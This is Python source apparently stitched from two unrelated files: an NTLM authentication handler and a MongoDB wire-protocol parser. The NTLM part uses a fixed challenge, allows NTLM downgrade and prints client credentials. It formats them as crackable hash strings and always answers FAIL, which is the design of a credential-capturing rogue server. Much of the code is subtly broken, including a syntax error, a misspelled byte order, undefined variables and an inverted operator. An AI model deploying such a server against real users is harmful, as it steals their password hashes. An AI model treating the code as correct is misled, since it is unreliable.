		t.ChallengeFromClinet_hex = buff.read(challengeLength).hex()

		return t

	def __repr__(self):
		t  = '== NTLMv2Response ==\r\n'
		t += 'Response           : %s\r\n' % repr(self.Response)
		t += 'ChallengeFromClinet: %s\r\n' % repr(self.ChallengeFromClinet)
		return t


class NTLMv2ClientChallenge:
	def __init__(self):
		self.RespType   = None
		self.HiRespType = None
		self.Reserved1  = None
		self.Reserved2  = None
		self.TimeStamp  = None
		self.ChallengeFromClient = None
		self.Reserved3  = None
		self.Details    = None #named AVPairs in the documentation
		self.Reserved4  = None

	@staticmethod
	def from_bytes(bbuff):
		return NTLMv2ClientChallenge.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		cc = NTLMv2ClientChallenge()
		cc.RespType   = int.from_bytes(buff.read(1), byteorder = 'little', signed = False)
		cc.HiRespType = int.from_bytes(buff.read(1), byteorder = 'little', signed = False)
		cc.Reserved1  = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
		cc.Reserved2  = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		cc.TimeStamp  = timestamp2datetime(buff.read(8))
		cc.ChallengeFromClient = buff.read(8).hex()
		cc.Reserved3  = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		cc.Details    = AVPairs.from_buffer(buff)
		cc.Reserved3 = int.from_bytes(buff.read(4), byteorder='little', signed=False)

		return cc

	def __repr__(self):
		t  = '== NTLMv2ClientChallenge ==\r\n'
		t += 'RespType           : %s\r\n' % repr(self.RespType)
		t += 'TimeStamp          : %s\r\n' % repr(self.TimeStamp)
		t += 'ChallengeFromClient: %s\r\n' % repr(self.ChallengeFromClient)
		t += 'Details            : %s\r\n' % repr(self.Details)
		return t


class NTLMChallenge:
	def __init__(self):
		self.Signature         = 'NTLMSSP\x00'
		self.MessageType       = 2
		self.TargetNameFields  = None
		self.NegotiateFlags    = None
		self.ServerChallenge   = None
		self.Reserved          = (b'\x00'*8).hex()
		self.TargetInfoFields  = None
		self.Version           = None
		self.Payload           = None

		self.TargetName        = None
		self.TargetInfo        = None

	@staticmethod
	def construct_from_template(templateName, challenge = os.urandom(8).hex(), ess = True):
		version    = NTLMServerTemplates[templateName]['version']
		challenge  = challenge
		targetName = NTLMServerTemplates[templateName]['targetname']
		targetInfo = NTLMServerTemplates[templateName]['targetinfo']
		targetInfo = NTLMServerTemplates[templateName]['targetinfo']
		flags      = NTLMServerTemplates[templateName]['flags']
		if ess:
			flags |= NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY
		else:
			flags &= ~NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY

		return NTLMChallenge.construct(challenge=challenge, targetName = targetName, targetInfo = targetInfo, version = version, flags= flags)
	
	
	# TODO: needs some clearning up (like re-calculating flags when needed)
	@staticmethod
	def construct(challenge = os.urandom(8), targetName = None, targetInfo = None, version = None, flags = None):
		t = NTLMChallenge()
		t.NegotiateFlags    = flags
		t.Version           = version
		t.ServerChallenge   = challenge
		t.TargetName        = targetName
		t.TargetInfo        = targetInfo

		t.TargetNameFields = Fields(len(t.TargetName.encode('utf-16le')),56) 
		t.TargetInfoFields = Fields(len(t.TargetInfo.to_bytes()), 56 + len(t.TargetName.encode('utf-16le')))

		t.Payload = t.TargetName.encode('utf-16le')
		t.Payload += t.TargetInfo.to_bytes()

		return t

	def to_bytes(self):
		tn = self.TargetName.encode('utf-16le')
		ti = self.TargetInfo.to_bytes()

		buff  = self.Signature.encode('ascii')
		buff += self.MessageType.to_bytes(4, byteorder = 'little', signed = False)
		buff += self.TargetNameFields.to_bytes()
		buff += self.NegotiateFlags.to_bytes(4, byteorder = 'little', signed = False)
		buff += bytes.fromhex(self.ServerChallenge)
		buff += bytes.fromhex(self.Reserved)
		buff += self.TargetInfoFields.to_bytes()
		buff += self.Version.to_bytes()
		buff += self.Payload

		return buff

	def __repr__(self):
		t  = '== NTLMChallenge ==\r\n'
		t += 'Signature      : %s\r\n' % repr(self.Signature)
		t += 'MessageType    : %s\r\n' % repr(self.MessageType)
		t += 'ServerChallenge: %s\r\n' % repr(self.ServerChallenge)
		t += 'TargetName     : %s\r\n' % repr(self.TargetName)
		t += 'TargetInfo     : %s\r\n' % repr(self.TargetInfo)
		return t

	def toBase64(self):
		return base64.b64encode(self.to_bytes()).decode('ascii')



# https://msdn.microsoft.com/en-us/library/cc236641.aspx
class NTLMNegotiate:
	def __init__(self):
		self.Signature         = None
		self.MessageType       = None
		self.NegotiateFlags    = None
		self.DomainNameFields  = None
		self.WorkstationFields = None
		self.Version           = None
		self.Payload           = None

		####High-level variables
		self.Domain      = None
		self.Workstation = None

	@staticmethod
	def from_bytes(bbuff):
		return NTLMNegotiate.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		t = NTLMNegotiate()
		t.Signature         = buff.read(8).decode('ascii')
		t.MessageType       = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		t.NegotiateFlags    = NegotiateFlags(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
		t.DomainNameFields  = Fields.from_buffer(buff)
		t.WorkstationFields = Fields.from_buffer(buff)

		if t.NegotiateFlags & NegotiateFlags.NEGOTIATE_VERSION: 
			t.Version = buff.read(8)

		currPos = buff.tell()
		
		if t.DomainNameFields.length != 0:
			buff.seek(t.DomainNameFields.offset, io.SEEK_SET)
			raw_data = buff.read(t.WorkstationFields.length)
			try:
				t.Domain = raw_data.decode('utf-16le')
			except UnicodeDecodeError:
				# yet another cool bug. some homebrew-NTLM clients discard the MSDN docu and send the text as ASCII
				t.Domain = raw_data.decode('utf-8')

		if t.WorkstationFields.length != 0:
			buff.seek(t.WorkstationFields.offset, io.SEEK_SET)
			raw_data = buff.read(t.WorkstationFields.length)
			try:
				t.Workstation = raw_data.decode('utf-16le')
			except UnicodeDecodeError:
				# yet another cool bug. some homebrew-NTLM clients discard the MSDN docu and send the text as ASCII
				t.Workstation = raw_data.decode('utf-8')

		buff.seek(currPos, io.SEEK_SET)
		return t

	def __repr__(self):
		t  = '== NTLMNegotiate ==\r\n'
		t += 'Signature  : %s\r\n' % repr(self.Signature)
		t += 'MessageType: %s\r\n' % repr(self.MessageType)
		t += 'NegotiateFlags: %s\r\n' % repr(self.NegotiateFlags)
		t += 'Version    : %s\r\n' % repr(self.Version)
		t += 'Domain     : %s\r\n' % repr(self.Domain)
		t += 'Workstation: %s\r\n' % repr(self.Workstation)
		return t

	def contrct(self):
		pass


class NTLMAuthMode(enum.Enum):
	CLIENT   = enum.auto()
	SERVER   = enum.auto()


class NTLMAUTHHandler:
	def __init__(self, mode = AUTHModuleMode.SERVER, credentials = {}):
		self.mode = mode
		self.use_NTLMv2            = None
		self.use_Extended_security = None
		self.serverTemplateName    = None
		self.challenge             = None
		
		self.ntlmNegotiate     = None #ntlm Negotiate message from client
		self.ntlmChallenge     = None #ntlm Challenge message to client
		self.ntlmAuthenticate  = None #ntlm Authenticate message from client

		self.credentials = credentials
		self.client_credentials = None 
		self.SessionBaseKey = None
		self.KeyExchangeKey = None

	def setup_defaults(self):
		self.use_NTLMv2 = True
		self.use_Extended_security = True
		self.serverTemplateName = 'Windows2003'
		self.challenge = 'A'*16

	def setup(self, settings = None):
		if not settings:
			self.setup_defaults()
			return
		self.use_NTLMv2 = not settings['ntlm_downgrade']
		self.use_Extended_security = settings['extended_security']
		self.challenge = settings['challenge']
		if settings['template']['name'].upper() == 'CUSTOM':
			NTLMServerTemplates['CUSTOM'] = {
				'flags'      : settings['template']['flags'],
				'version'    : settings['template']['version'],
				'targetinfo' : settings['template']['targetinfo'],
				'targetname' : settings['template']['targetname'],
			}

		else:
			if settings['template']['name'] in NTLMServerTemplates:
				self.serverTemplateName = settings['template']['name']
		
	#def calc_key_exchange_key(self, auth_cred):
	#	if isinstance(auth_cred, netntlm_ess):
	#		hm = hmac_md5(self.SessionBaseKey)
	#		hm.update(self.ntlmChallenge. + lm_challenge_response[:8])
	#		self.KeyExchangeKey = hm.digest()
	#		return
    #
	#	elif isinstance(auth_cred, netntlm):
	#		if self.ntlmAuthenticate.NegotiateFlags & NegotiateFlags.NEGOTIATE_LM_KEY:
	#			"""
	#			des_handler = DES(DES.key56_to_key64(lm_hash[:7]))
	#			first_des = des_handler.encrypt(lm_challenge_response[:8])
    #
	#			second_des_key = lm_hash[7:8] + b"\xbd\xbd\xbd\xbd\xbd\xbd"
	#			des_handler = DES(DES.key56_to_key64(second_des_key))
	#			second_des = des_handler.encrypt(lm_challenge_response[:8])
    #
	#			key_exchange_key = first_des + second_des
	#			"""
	#			return
	#		elif self.ntlmAuthenticate.NegotiateFlags & NegotiateFlags.REQUEST_NON_NT_SESSION_KEY:
	#			# key_exchange_key = lm_hash[:8] + b'\0' * 8
	#			return
	#		else:
	#			self.KeyExchangeKey = self.SessionBaseKey
    #
	#	elif isinstance(auth_cred, netntlmv2):
	#		self.KeyExchangeKey = self.SessionBaseKey
    #
    #
	#	return

	def do_auth(self, authData):
		if self.ntlmNegotiate is None:
			###parse client NTLMNegotiate message
			self.ntlmNegotiate = NTLMNegotiate.from_bytes(authData)
			self.ntlmChallenge = NTLMChallenge.construct_from_template(self.serverTemplateName, challenge = self.challenge, ess = self.use_Extended_security)
			return AuthResult.CONTINUE, self.ntlmChallenge.to_bytes()

		elif self.ntlmAuthenticate is None:
			self.ntlmAuthenticate = NTLMAuthenticate.from_bytes(authData, self.use_NTLMv2)
			creds = NTLMCredentials.construct(self.ntlmNegotiate, self.ntlmChallenge, self.ntlmAuthenticate)
			print(creds)

			# TODO: check when is sessionkey needed and check when is singing needed, and calculate the keys!
			# self.calc_SessionBaseKey()
			# self.calc_KeyExchangeKey()
			auth_credential = creds[0]
			#self.SessionBaseKey = auth_credential.calc_session_base_key()
			#self.calc_key_exchange_key()

			if auth_credential.verify(self.credentials):
				return AuthResult.FAIL, auth_credential
			else:
				return AuthResult.FAIL, auth_credential

		else:
			raise Exception('Too many calls to do_AUTH function!')


class NTLMCredentials:
	@staticmethod
	def construct(ntlmNegotiate, ntlmChallenge, ntlmAuthenticate):
		# now the guessing-game begins

		if isinstance(ntlmAuthenticate.NTChallenge, NTLMv2Response):
		#if ntlmAuthenticate._use_NTLMv2:
			# this is a netNTLMv2 then, otherwise auth would have failed on protocol level
			creds = netntlmv2()
			creds.username = ntlmAuthenticate.UserName
			creds.domain   = ntlmAuthenticate.DomainName
			creds.ServerChallenge = ntlmChallenge.ServerChallenge
			creds.ClientResponse  = ntlmAuthenticate.NTChallenge.Response
			creds.ChallengeFromClinet = ntlmAuthenticate.NTChallenge.ChallengeFromClinet_hex

			creds2 = netlmv2()
			creds2.username = ntlmAuthenticate.UserName
			creds2.domain   = ntlmAuthenticate.DomainName
			creds2.ServerChallenge = ntlmChallenge.ServerChallenge
			creds2.ClientResponse  = ntlmAuthenticate.LMChallenge.Response
			creds2.ChallengeFromClinet = ntlmAuthenticate.LMChallenge.ChallengeFromClinet
			return [creds, creds2]

		else:
			if ntlmAuthenticate.NegotiateFlags & NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY:
				# extended security is used, this means that the LMresponse actually contains client challenge data
				# and the LM and NT respondses need to be combined to form the cred data
				creds = netntlm_ess()
				creds.username = ntlmAuthenticate.UserName
				creds.domain   = ntlmAuthenticate.DomainName
				creds.ServerChallenge = ntlmChallenge.ServerChallenge
				creds.ClientResponse  = ntlmAuthenticate.NTChallenge.Response
				creds.ChallengeFromClinet = ntlmAuthenticate.LMChallenge.Response

				return [creds]

			else:
				creds = netntlm()
				creds.username = ntlmAuthenticate.UserName
				creds.domain   = ntlmAuthenticate.DomainName
				creds.ServerChallenge = ntlmChallenge.ServerChallenge
				creds.ClientResponse  = ntlmAuthenticate.NTChallenge.Response
				
				if ntlmAuthenticate.NTChallenge.Response == ntlmAuthenticate.LMChallenge.Response:
					# the the two responses are the same, then the client did not send encrypted LM hashes, only NT
					return [creds]
					

				# CAME FOR COPPER, FOUND GOLD!!!!!
				# HOW OUTDATED IS YOUR CLIENT ANYHOW???
				creds2 = netlm()
				creds2.username = ntlmAuthenticate.UserName
				creds2.domain   = ntlmAuthenticate.DomainName
				creds2.ServerChallenge = ntlmChallenge.ServerChallenge
				creds2.ClientResponse  = ntlmAuthenticate.LMChallenge.Response
				return [creds2, creds]

class netlm:
	# not supported by hashcat?
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.username = None
		self.domain = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		# this is from the LMv1Response class (that is a member of NTLMAuthenticate class)
		self.ClientResponse = None

	def to_credential(self):
		cred = Credential('netLM',
							username = self.username, 
							fullhash = '%s:$NETLM$%s$%s' % (self.username, self.ServerChallenge, self.ClientResponse)
						)
		return cred

	def verify(self, creds, credtype='plain'):
		"""
		Verifies the authentication data against the user credentials
		Be careful! If the credtype is 'hash' then LM hash is expected!
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform
		:return: bool
		"""

		# print('Creds: %s' % creds)
		if creds is None:
			return True

		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			lm_hash = LMOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			lm_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		calc_response = DESL(lm_hash, self.ServerChallenge)

		return self.ClientResponse == calc_response.hex()


class netlmv2:
	# not supported by hashcat?
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.username = None
		self.domain = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		# this is from the LMv2Response class (that is a member of NTLMAuthenticate class)
		self.ClientResponse = None
		self.ChallengeFromClinet = None

	def to_credential(self):
		cred = Credential(
			'netLMv2',
			username = self.username,
			fullhash = '$NETLMv2$%s$%s$%s$%s' % (self.username, self.ServerChallenge, self.ClientResponse, self.ChallengeFromClinet)
		)
		return cred

	def verify(self, creds, credtype='plain'):
		"""
		Verifies the authentication data against the user credentials
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform
		:return: bool
		"""

		# print('Creds: %s' % creds)
		if creds is None:
			return True

		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			lm_hash = LMOWFv2(creds[self.domain][self.username], self.username, self.domain)
		elif credtype == 'hash':
			lm_hash = LMOWFv2(None, self.username, self.domain, bytes.fromhex(creds[self.domain][self.username]))
		else:
			raise Exception('Unknown cred type!')

		hm = hmac_md5(lm_hash)
		hm.update(bytes.fromhex(self.ServerChallenge))
		hm.update(bytes.fromhex(self.ChallengeFromClinet))

		return self.ClientResponse == hm.hexdigest()


class netntlm_ess:
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.username = None
		self.domain = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		# this is from the NTLMv1Response class (that is a member of NTLMAuthenticate class)
		self.ClientResponse = None
		self.ChallengeFromClinet = None

	def to_credential(self):
		cred = Credential(
			'netNTLMv1-ESS',
			username = self.username,
			fullhash = '%s::%s:%s:%s:%s' % (self.username, self.domain, self.ChallengeFromClinet, self.ClientResponse, self.ServerChallenge)
		)
		return cred
		# u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

	def calc_session_base_key(self, creds, credtype = 'plain'):
		if credtype == 'plain':
			nt_hash = NTOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			nt_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		session_base_key = md4(nt_hash).digest()
		return session_base_key

	def verify(self, creds, credtype='plain'):
		"""
		Verifies the authentication data against the user credentials
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform
		:return: bool
		"""
		if creds is None:
			return True
		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			nt_hash = NTOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			nt_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		# print('Server chall: %s' % self.ServerChallenge)
		# print('Client chall: %s' % self.ChallengeFromClinet)

		temp_1 = md5(bytes.fromhex(self.ServerChallenge) + bytes.fromhex(self.ChallengeFromClinet)[:8]).digest()
		calc_response = DESL(nt_hash, temp_1[:8])
		# print('calc_response: %s' % calc_response.hex())
		# print('ClientResponse: %s' %  self.ClientResponse)

		return calc_response == bytes.fromhex(self.ClientResponse)


class netntlm:
	# not supported by hashcat?
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.username = None
		self.domain = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		# this is from the NTLMv1Response class (that is a member of NTLMAuthenticate class)
		self.ClientResponse = None

	def to_credential(self):
		cred = Credential('netNTLMv1',
							username = self.username, 
							fullhash = '%s:$NETNTLM$%s$%s' % (self.username, self.ServerChallenge, self.ClientResponse)
						)
		return cred
		#username:$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233

	def calc_session_base_key(self, creds, credtype = 'plain'):
		if credtype == 'plain':
			nt_hash = NTOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			nt_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		session_base_key = md4(nt_hash).digest()
		return session_base_key

	def verify(self, creds, credtype='plain'):
		"""
		Verifies the authentication data against the user credentials
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform
		:return: bool
		"""
		if creds is None:
			return True
		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			nt_hash = NTOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			nt_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		return DESL(nt_hash, self.ServerChallenge) == bytes.fromhex(self.ClientResponse)


class netntlmv2:
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.username = None
		self.domain = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		# this is from the NTLMv2Response class (that is a member of NTLMAuthenticate class)
		self.ClientResponse = None
		self.ChallengeFromClinet = None

	def to_credential(self):
		cred = Credential(
			'netNTLMv2',
			username = self.username,
			domain = self.domain,
			fullhash = '%s::%s:%s:%s:%s' % (self.username, self.domain, self.ServerChallenge, self.ClientResponse, self.ChallengeFromClinet)
		)
		return cred

	def calc_session_base_key(self, creds, credtype = 'plain'):
		if credtype == 'plain':
			nt_hash = NTOWFv2(creds[self.domain][self.username], self.username, self.domain)
		elif credtype == 'hash':
			nt_hash = NTOWFv2(None, self.username, self.domain, bytes.fromhex(creds[self.domain][self.username]))
		else:
			raise Exception('Unknown cred type!')

		hm = hmac_md5(nt_hash)
		hm.update(self.ClientResponse)
		return hm.digest()

	def verify(self, creds, credtype = 'plain'):
		"""
		Verifies the authentication data against the user credentials
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform 
		:return: bool
		"""

		# print('Creds: %s' % creds)
		if creds is None:
			return True

		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			nt_hash = NTOWFv2(creds[self.domain][self.username], self.username, self.domain)
		elif credtype == 'hash':
			nt_hash = NTOWFv2(None, self.username, self.domain, bytes.fromhex(creds[self.domain][self.username]))
		else:
			raise Exception('Unknown cred type!')

		# print(self.ServerChallenge)
		# print(self.ChallengeFromClinet)

		hm = hmac_md5(nt_hash)
		hm.update(bytes.fromhex(self.ServerChallenge))
		hm.update(bytes.fromhex(self.ChallengeFromClinet))

		# print('M_nthash: %s' % nthash.hex())
		# print('M_temp: %s' % self.ChallengeFromClinet)
		# print('M_nthash: %s' % nthash.hex())
		# print('M_server_chall: %s' % self.ServerChallenge)
		# print('M_ntproof_string: %s' % self.ClientResponse)
		# print('M_ntproof_string_calc: %s' % hm.hexdigest())

		return self.ClientResponse == hm.hexdigest()


def LMOWFv1(password):
	LM_SECRET = b'KGS!@#$%'
	t1 = password[:14].ljust(14, '\x00').upper()
	d = DES(t1[:7].encode('ascii'))
	r1 = d.encrypt(LM_SECRET)
	d = DES(t1[7:].encode('ascii'))
	r2 = d.encrypt(LM_SECRET)

	return r1+r2
	

def NTOWFv1(password):
	return md4(password.encode('utf-16le')).digest()


def LMOWFv2(Passwd, User, UserDom, PasswdHash = None):
	return NTOWFv2(Passwd, User, UserDom, PasswdHash)


def NTOWFv2(Passwd, User, UserDom, PasswdHash = None):
	if PasswdHash is not None:
		fp = hmac_md5(PasswdHash)
	else:
		fp = hmac_md5(NTOWFv1(Passwd))
	fp.update((User.upper() + UserDom).encode('utf-16le'))
	return fp.digest()


def DESL(K, D):
	"""
	Indicates the encryption of an 8-byte data item D with the 16-byte key K
	using the Data Encryption Standard Long (DESL) algorithm.
	The result is 24 bytes in length.
	:param K:
	:param D:
	:return:
	"""
	if len(K) != 16:
		raise Exception("K MUST be 16 bytes long")
	if len(D) != 8:
		raise Exception("D MUST be 8 bytes long")

	res = b''
	print(len(K[:6]))
	res += DES(K[:7]).encrypt(D)
	res += DES(K[7:14]).encrypt(D)
	res += DES(K[14:] + b'\x00'*5).encrypt(D)
	return res




# https://docs.mongodb.com/manual/reference/mongodb-wire-protocol/
# https://docs.mongodb.com/manual/core/security-scram/#authentication-scram
# 
import enum
import bson
import io

def read_bson(buff):
	length_data = buff.read(4)
	length = int.from_bytes(length_data, byteorder = 'little', signed = False)
	return bson.loads(length_data + buff.read(length))


def buffer_peek(buff, length = 1):
	pos = buff.tell()
	temp = buff.read(length)
	buff.seek(pos, 0)
	return temp

def get_buffer_endpos(buff):
	pos = buff.tell()
	buff.seek(0, 2)
	pos_end = buff.tell()
	buff.seek(pos, 0)
	return pos_end

def get_buffer_size(buff):
	pos = buff.tell()
	buff.seek(0, 0)
	pos_start = buff.tell()
	buff.seek(0, 2)
	pos_end = buff.tell()
	buff.seek(pos, 0)

	return pos_end - pos_start

def read_cstring(buff):
	# TODO: make this better
	temp = b''
	end_pos = get_buffer_endpos(buff)
	while buff.tell() <= end_pos:
		c = buff.read(1)
		temp += c
		if c == b'\x00':
			break

	if temp[-1:] != b'\x00':
		return None
	return temp

class Section0:
	def __init__(self):
		self.kind = 0
		self.body = None

	@staticmethod
	def from_bytes(bbuff):
		return Section0.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		section = Section0()
		section.kind = int.from_bytes(buff.read(1), byteorder = 'little', signed = False)
		section.body = read_bson(buff)
		return section

class Section1:
	def __init__(self):
		self.kind = 1
		self.length = None
		self.sequenceId = None
		self.datas = [] #Zero or more BSON objects #word from the author: WHAT THE FUCK??? WHY ARE YOU DOING THIS SHIT?	

	@staticmethod
	def from_bytes(bbuff):
		return Section1.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		section = Section1()
		section.kind = int.from_bytes(buff.read(1), byteorder = 'little', signed = False)
		section.length = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		section.sequenceId = read_cstring(buff)
		datas_len_pos = buff.tell() + section.length

		while buff.tell() <= datas_len_pos:
			bdata = read_bson(buff)
			section.datas.append(bdata)

		return section

class RequestOpcode(enum.Enum):
	OP_REPLY = 1 #Reply to a client request. responseTo is set.
	OP_UPDATE = 2001# 	Update document.
	OP_INSERT = 2002# 	Insert new document.
	RESERVED = 2003# 	Formerly used for OP_GET_BY_OID.
	OP_QUERY = 2004# 	Query a collection.
	OP_GET_MORE = 2005# 	Get more data from a query. See Cursors.
	OP_DELETE = 2006# 	Delete documents.
	OP_KILL_CURSORS = 2007# 	Notify database that the client has finished with the cursor.
	OP_COMMAND = 2010# 	Cluster internal protocol representing a command request.
	OP_COMMANDREPLY = 2011# 	Cluster internal protocol representing a reply to an OP_COMMAND.
	OP_MSG = 2013# 	Send a message using the format introduced in MongoDB 3.6.


class MongoMessageParser:
	def __init__(self):
		pass

	@staticmethod
	async def from_streamreader(reader):
		t_messageLength = await readexactly_or_exc(reader, 4, timeout = self.timeout)
		t_requestID = await readexactly_or_exc(reader, 4, timeout = self.timeout)
		t_responseTo = await readexactly_or_exc(reader, 4, timeout = self.timeout)
		t_opCode = await readexactly_or_exc(reader, 4, timeout = self.timeout)
		msg_type = RequestOpcode(int.from_bytes(t_opCode, byteorder = 'little', signed = False))
		msg_length = int.from_bytes(t_length, byteorder = 'little', signed = False)
		rlen = msg_length - 16
		t_data = await readexactly_or_exc(reader, rlen, timeout = self.timeout)
		return mongotype2class[msg_type].from_bytes(t_messageLength + t_requestID + t_responseTo + t_opCode)

class MsgHeader:
	def __init__(self):
		self.messageLength = None
		self.requestID = None
		self.responseTo = None
		self.opCode = None

	@staticmethod
	def from_bytes(bbuff):
		return MsgHeader.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		hdr = MsgHeader()
		hdr.messageLength = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		hdr.requestID = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		hdr.responseTo = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		hdr.opCode = RequestOpcode(int.from_bytes(buff.read(4), byteorder = 'litte', signed = False))
		return hdr


class OP_QUERYFlags(enum.IntFlag):
	Reserved = 0
	TailableCursor = 1
	SLAVE_OK = 2
	OPLOG_REPLAY = 3
	NO_CURSOR_TIMEOUT = 4
	AWAIT_DATA = 5
	EXHAUST = 6
	PARTIAL = 7


class OP_QUERY:
	def __init__(self):
		self.header = None
		self.flags = None
		self.fullCollectionName = None
		self.numberToSkip = None
		self.numberToReturn = None
		self.query = None
		self.returnFieldsSelector = None #OPTIONAL!

	@staticmethod
	def from_bytes(bbuff):
		return OP_QUERY.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = OP_QUERY()
		msg.header = MsgHeader.from_buffer(buff)
		msg.flags = OP_QUERYFlags(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
		msg.fullCollectionName = read_cstring(buff).decode()
		msg.numberToSkip = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		msg.numberToReturn = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		msg.query = read_bson(buff)
		if buff.tell() != get_buffer_endpos(buff)
			msg.returnFieldsSelector = read_bson(buff)

		return msg

class OP_MSGFlags(enum.IntFlag):
	checksumPresent = 0
	moreToCome = 1
	exhaustAllowed = 16


class OP_MSG:
	def __init__(self):
		self.header = None
		self.flagBits = None
		self.sections = None
		self.checksum = None

	@staticmethod
	def from_bytes(bbuff):
		return OP_MSG.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = OP_MSG()
		msg.header = MsgHeader.from_buffer(buff)
		msg.flagBits = OP_MSGFlags(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
		
		end_pos = get_buffer_endpos(buff)
		if msg.flagBits & OP_MSGFlags.checksumPresent:
			end_pos =- 4

		while buff.tell() != end_pos:
			kind = buffer_peek(buff)
			section = sectionkind2class[kind].from_buffer(buff)
			msg.sections.append(section)

		if msg.flagBits & OP_MSGFlags.checksumPresent:
			msg.checksum = buff.read(4)
		
		return msg

	def to_bytes(self):
		t = self.flagBits.to_bytes(4, byteorder = 'little', signed = False)
		for section in self.sections:
			t += section.to_bytes()

		if self.checksum:
			t += self.checksum.to_bytes(4, byteorder = 'little', signed = False)

		t = self.header.to_bytes() + t

		return t



class OP_REPLYFlags(enum.IntFlag):
	CursorNotFound = 0
	QueryFailure = 1
	ShardConfigStale = 2
	AwaitCapable = 3


class OP_REPLY:
	def __init__(self):
		self.header = None
		self.responseFlags = None
		self.cursorID = None
		self.startingFrom = None
		self.numberReturned = None
		self.documents = []

	@staticmethod
	def from_bytes(bbuff):
		return OP_MSG.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = OP_MSG()
		msg.header = MsgHeader.from_buffer(buff)
		msg.responseFlags = OP_REPLYFlags(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
		msg.cursorID = int.from_bytes(buff.read(8), byteorder = 'little', signed = False)
		msg.startingFrom = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		msg.numberReturned = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		
		end_pos = get_buffer_endpos(buff)
		while buff.tell() <= end_pos:
			document = read_document(buff)
			msg.documents.append(document)

		return msg

	def to_bytes(self):
		t = self.header.to_bytes()
		t += self.responseFlags.to_bytes(4, byteorder = 'little', signed = False)
		t += self.cursorID.to_bytes(8, byteorder = 'little', signed = False)
		t += self.startingFrom.to_bytes(4, byteorder = 'little', signed = False)
		t += self.numberReturned.to_bytes(4, byteorder = 'little', signed = False)
		for document in self.documents:
			t += bson.dumps(document)

		return t


mongotype2class = {
	RequestOpcode.OP_REPLY : OP_REPLY,
	RequestOpcode.OP_UPDATE : None,
	RequestOpcode.OP_INSERT : None,
	RequestOpcode.RESERVED : None,
	RequestOpcode.OP_QUERY : OP_QUERY,
	RequestOpcode.OP_GET_MORE : None,
	RequestOpcode.OP_DELETE : None,
	RequestOpcode.OP_KILL_CURSORS : None,
	RequestOpcode.OP_COMMAND : None,
	RequestOpcode.OP_COMMANDREPLY : None,
	RequestOpcode.OP_MSG : OP_MSG,

}

sectionkind2class = {
	0 : Section0,
	1 : Section1,
}